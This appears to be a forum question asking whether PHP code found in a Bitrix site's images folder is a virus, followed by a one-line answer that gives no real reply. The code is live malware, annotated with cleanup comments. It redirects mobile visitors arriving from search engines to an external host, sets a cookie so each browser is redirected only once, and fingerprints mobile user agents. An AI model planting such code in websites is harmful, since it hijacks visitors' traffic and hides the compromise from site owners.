Malware
Jupiter Max, 2018-10-03 06:00:38

Does it look like a virus in Bitrix?

Hello.
I need to make some changes to a Bitrix site. I uploaded the site to my server, and a scan flagged the code below as a virus. The file is located in the directory bitrix/images/main.

<?if(isset($_SERVER['HTTP_REFERER']) AND !isset($_COOKIE["SESSION_ID27"]))
// Conditional redirect: the body runs only when the request carries a Referer
// header and the marker cookie SESSION_ID27 is absent.
{setcookie("SESSION_ID27", "1", time()+315360000, "/");
// ^ The marker cookie is set before any further check, for the whole site ("/"),
//   with a lifetime of 315360000 seconds (3650 days). A browser that keeps the
//   cookie therefore reaches the checks below only on its first such request.
// Substrings searched for in the Referer value (search-engine and portal names).
$urls = array("google.", "yandex.", "yahoo.", "aol.", "msn.", "rambler.", "mail.", "ya.", "bing.", "qip.");
// The for loop has no braces: its body is the single if statement that follows.
for ($i=0; $i < count($urls); $i++)	
if (strpos($_SERVER['HTTP_REFERER'],$urls[$i])!==false){
  // Referer matched one of the substrings. Only if is_mobile() also returns a
  // truthy value does the script stop here and emit an inline <script> that
  // points the top-level window at an external host instead of the page.
  if(is_mobile())
    exit('<script>window.top.location.href = "http://ltell.ru/";</script>');
  }
  
}
// NOTE(review): requests without a Referer, with a Referer that matches none of
// the substrings, from clients is_mobile() does not recognise, or from a browser
// already holding SESSION_ID27 fall through untouched, so the redirect is not
// visible when the site is opened directly from a desktop browser. The cookie
// name and the host in the exit() string are the concrete values to search for
// in the rest of the webroot and in access logs. How this file gets included or
// requested is not visible here - confirm during cleanup.




/**
 * Decides from request headers alone whether the client looks like a mobile
 * device. The return value identifies which check matched:
 *
 *   1     - the Accept header contains text/vnd.wap.wml or
 *           application/vnd.wap.xhtml+xml
 *   2     - an X-Wap-Profile or Profile request header is present
 *   3     - the lower-cased User-Agent matches the keyword regex
 *   4     - the first four characters of the lower-cased User-Agent are in
 *           the prefix list
 *   false - none of the checks matched
 *
 * The top-level code in this file only tests the result for truthiness, so the
 * distinct codes 1-4 are not used there.
 *
 * @return int|false
 */
function is_mobile(){
  // Both header values are read from the environment and lower-cased so the
  // comparisons below are case-insensitive.
  $user_agent=strtolower(getenv('HTTP_USER_AGENT')); 
  $accept=strtolower(getenv('HTTP_ACCEPT')); 
 
  // Check 1: WAP content types advertised in the Accept header.
  if ((strpos($accept,'text/vnd.wap.wml')!==false) || 
      (strpos($accept,'application/vnd.wap.xhtml+xml')!==false)) { 
    return 1;
  } 
 
  // Check 2: presence of WAP profile headers, whatever their value.
  if (isset($_SERVER['HTTP_X_WAP_PROFILE']) || 
      isset($_SERVER['HTTP_PROFILE'])) { 
    return 2;
  } 
 
  // Check 3: unanchored keyword match anywhere in the User-Agent. The dots in
  // entries such as "mini 9.5" and "up.browser" are not escaped, so they match
  // any character.
  if (preg_match('/(mini 9.5|vx1000|lge |m800|e860|u940|ux840|compal|'. 
    'wireless| mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|'. 
    'lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|'. 
    'mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|'. 
    'm881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|'. 
    'r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|'. 
    'i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|'. 
    'htil-g1|fly v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|'. 
    'sanyo|vx54|c888|nx250|n120|mtk |c5588|s710|t880|c5005|i;458x|'. 
    'p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|'. 
    '_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|'. 
    's800|8325rc|ac831|mw200|brew |d88|htc\/|htc_touch|355x|m50|km100|'. 
    'd736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg |'. 
    'sonyericsson|samsung|240x|x320vx10|nokia|sony cmd|motorola|'. 
    'up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|'. 
    'pocket|kindle|mobile|psp|treo|android|iphone|ipod|webos|wp7|wp8|'. 
    'fennec|blackberry|htc_|opera m|windowsphone)/', $user_agent)) { 
    return 3;
  } 
 
  // Check 4: the first four characters of the User-Agent compared against a
  // fixed prefix list. in_array() is called without the strict flag.
  if (in_array(substr($user_agent,0,4), 
    Array("1207", "3gso", "4thp", "501i", "502i", "503i", "504i", "505i", "506i", 
          "6310", "6590", "770s", "802s", "a wa", "abac", "acer", "acoo", "acs-", 
          "aiko", "airn", "alav", "alca", "alco", "amoi", "anex", "anny", "anyw", 
          "aptu", "arch", "argo", "aste", "asus", "attw", "au-m", "audi", "aur ", 
          "aus ", "avan", "beck", "bell", "benq", "bilb", "bird", "blac", "blaz", 
          "brew", "brvw", "bumb", "bw-n", "bw-u", "c55/", "capi", "ccwa", "cdm-", 
          "cell", "chtm", "cldc", "cmd-", "cond", "craw", "dait", "dall", "dang", 
          "dbte", "dc-s", "devi", "dica", "dmob", "doco", "dopo", "ds-d", "ds12", 
          "el49", "elai", "eml2", "emul", "eric", "erk0", "esl8", "ez40", "ez60", 
          "ez70", "ezos", "ezwa", "ezze", "fake", "fetc", "fly-", "fly_", "g-mo", 
          "g1 u", "g560", "gene", "gf-5", "go.w", "good", "grad", "grun", "haie", 
          "hcit", "hd-m", "hd-p", "hd-t", "hei-", "hiba", "hipt", "hita", "hp i", 
          "hpip", "hs-c", "htc ", "htc-", "htc_", "htca", "htcg", "htcp", "htcs", 
          "htct", "http", "huaw", "hutc", "i-20", "i-go", "i-ma", "i230", "iac", 
          "iac-", "iac/", "ibro", "idea", "ig01", "ikom", "im1k", "inno", "ipaq", 
          "iris", "jata", "java", "jbro", "jemu", "jigs", "kddi", "keji", "kgt", 
          "kgt/", "klon", "kpt ", "kwc-", "kyoc", "kyok", "leno", "lexi", "lg g", 
          "lg-a", "lg-b", "lg-c", "lg-d", "lg-f", "lg-g", "lg-k", "lg-l", "lg-m", 
          "lg-o", "lg-p", "lg-s", "lg-t", "lg-u", "lg-w", "lg/k", "lg/l", "lg/u", 
          "lg50", "lg54", "lge-", "lge/", "libw", "lynx", "m-cr", "m1-w", "m3ga", 
          "m50/", "mate", "maui", "maxo", "mc01", "mc21", "mcca", "medi", "merc", 
          "meri", "midp", "mio8", "mioa", "mits", "mmef", "mo01", "mo02", "mobi", 
          "mode", "modo", "mot ", "mot-", "moto", "motv", "mozz", "mt50", "mtp1", 
          "mtv ", "mwbp", "mywa", "n100", "n101", "n102", "n202", "n203", "n300", 
          "n302", "n500", "n502", "n505", "n700", "n701", "n710", "nec-", "nem-", 
          "neon", "netf", "newg", "newt", "nok6", "noki", "nzph", "o2 x", "o2-x", 
          "o2im", "opti", "opwv", "oran", "owg1", "p800", "palm", "pana", "pand", 
          "pant", "pdxg", "pg-1", "pg-2", "pg-3", "pg-6", "pg-8", "pg-c", "pg13", 
          "phil", "pire", "play", "pluc", "pn-2", "pock", "port", "pose", "prox", 
          "psio", "pt-g", "qa-a", "qc-2", "qc-3", "qc-5", "qc-7", "qc07", "qc12", 
          "qc21", "qc32", "qc60", "qci-", "qtek", "qwap", "r380", "r600", "raks", 
          "rim9", "rove", "rozo", "s55/", "sage", "sama", "samm", "sams", "sany", 
          "sava", "sc01", "sch-", "scoo", "scp-", "sdk/", "se47", "sec-", "sec0", 
          "sec1", "semc", "send", "seri", "sgh-", "shar", "sie-", "siem", "sk-0", 
          "sl45", "slid", "smal", "smar", "smb3", "smit", "smt5", "soft", "sony", 
          "sp01", "sph-", "spv ", "spv-", "sy01", "symb", "t-mo", "t218", "t250", 
          "t600", "t610", "t618", "tagt", "talk", "tcl-", "tdg-", "teli", "telm", 
          "tim-", "topl", "tosh", "treo", "ts70", "tsm-", "tsm3", "tsm5", "tx-9", 
          "up.b", "upg1", "upsi", "utst", "v400", "v750", "veri", "virg", "vite", 
          "vk-v", "vk40", "vk50", "vk52", "vk53", "vm40", "voda", "vulc", "vx52", 
          "vx53", "vx60", "vx61", "vx70", "vx80", "vx81", "vx83", "vx85", "vx98", 
          "w3c ", "w3c-", "wap-", "wapa", "wapi", "wapj", "wapm", "wapp", "wapr", 
          "waps", "wapt", "wapu", "wapv", "wapy", "webc", "whit", "wig ", "winc", 
          "winw", "wmlb", "wonu", "x700", "xda-", "xda2", "xdag", "yas-", "your", 
          "zeto", "zte-"))) { 
    return 4; 
  } 
 
  // No check matched: the client is treated as non-mobile.
  return false; 
}

?>


1 answer(s)
Ainur Valiev, 2018-10-03
@vaajnur

to any
